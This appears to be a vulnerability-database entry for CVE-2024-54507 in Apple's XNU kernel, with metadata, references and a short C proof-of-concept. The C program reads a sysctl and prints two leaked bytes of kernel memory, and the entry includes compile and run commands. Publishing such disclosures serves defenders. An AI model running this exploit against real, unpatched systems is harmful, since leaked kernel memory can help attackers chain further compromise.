Proof Of Concept

vulnerability:exploitability=documented vulnerability:information=PoC

Created on 2025-01-24 06:21 and updated on 2025-01-24 06:32.

Description

// ravi (@0xjprx)
// 2-byte kernel infoleak, introduced in xnu-11215.1.10.
// gcc SUSCTL.c -o susctl
// ./susctl
#include <stdio.h>
#include <sys/sysctl.h>

void leak() {
    uint64_t val = 0;
    size_t len = sizeof(val);
    sysctlbyname("net.inet.udp.log.remote_port_excluded", &val, &len, NULL, 0);
    printf("leaked: 0x%llX 0x%llX\n", (val >> 16) & 0x0FF, (val >> 24) & 0x0FF);
}

int main() {
    leak();
    return 0;
}

from https://github.com/jprx/CVE-2024-54507

Associated vulnerability

CVE-2024-54507

Related vulnerabilities

CVE-2024-54507

Meta

[
   {
      ref: [
         "https://github.com/jprx/CVE-2024-54507",
         "https://jprx.io/cve-2024-54507/",
      ],
      tags: [
         "vulnerability:exploitability=documented",
         "vulnerability:information=PoC",
      ],
   },
]

Author

Cédric Bonhomme